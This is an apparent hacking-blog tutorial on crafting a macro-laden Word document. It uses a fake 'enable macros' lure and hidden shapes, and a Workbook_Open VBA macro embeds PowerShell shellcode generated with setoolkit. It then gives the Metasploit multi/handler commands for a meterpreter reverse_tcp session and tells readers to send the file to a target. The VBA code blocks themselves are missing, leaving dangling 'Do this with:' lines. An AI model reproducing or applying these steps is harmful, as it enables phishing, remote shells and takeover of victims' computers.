In the last series we've crafted poisoned word documents. The only thing we had to do is send it to the target, wait till he/she opens it and ... PWNED! The only problem is that it's quite hard to get the target so far that he/she clicks the "enable macros" button . For that we should need some social engineering. Social engineering is really hard and not everyone is just as good as famous social engineers like Kevin Mitnick.
Here are some other examples of malicious documents.
The first step is to open up word. On top of our document I've typed: " PLEASE ENABLE MACROS TO SEE FULL the CONTENT! " You can type here your own warning message but keep in mind that your code will be a little different.
The second step is to create two 'shapes'. The first shape is the loading image, the image you want to flip. You can copy-paste one of these images if you want.
Select an square or rectangle and place it over the "Please Wait" image.
Then 'fill' the shape with and the borders white and our image is hidden.
The third step is to create a watermark. Go to page layout -> watermark -> custom watermark . Now you'll see a menu like this:
Great now we've created our layout however it's still static. Let's put some 'magic' in it. We'll do this by creating our vba script. To create our script hit Alt+F8, this will open up a menu that gives you a few options. Type in that text box on top Workbook_Open and than hit the create box. Now you are in the Microsoft Visual Basic editor ow how they called it. This is the "IDE" we're going to use to design and execute our code
The first part of the code is the declaration of variables of the 2 shapes.
The variables are:
Do this with:
Do this with:
Do this with:
Copy-paste this code:
Note that this payload is a powershell payload but you can add here any payload you want.
Go to your (kali)linux machine and just enter setoolkit to start the setoolkit. If you are in the setoolkit select these options
- 1 for "social engineering attacks
- 9 for "powershell attack vectors
- 1 for "powershell alphanumeric shellcode injector
Then the setoolkit will ask you for a LHOST and a LPORT.Open up a new terminal-window and use the command: ifconfig wlan0 .Copy the inet adrr (remember that this adress is LAN only). Choose as LPORT whatever you want but I use 4444. Shutdown the setoolkit and display the shellcode. Do this with cat /root/.set/reports/powershell/x86_powershell_injection.txt. Tip: If you're using vmware player and want to move that file to your windows box type nautilus /root/.set/reports/powershell/ and drag'n drop the file to your windows machine.
If you got that file. Copy the code and go back to the vba IDE.
Now add this line and copy the payload between the brackets:
- use multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST (your IP adress)
- set LPORT 4444
- exploit
Now send the document to your target, and see if he hit's that "enable-macros"button :)
That was it for today guys bye.
@ClaimItToYou
ps, here is the whole script,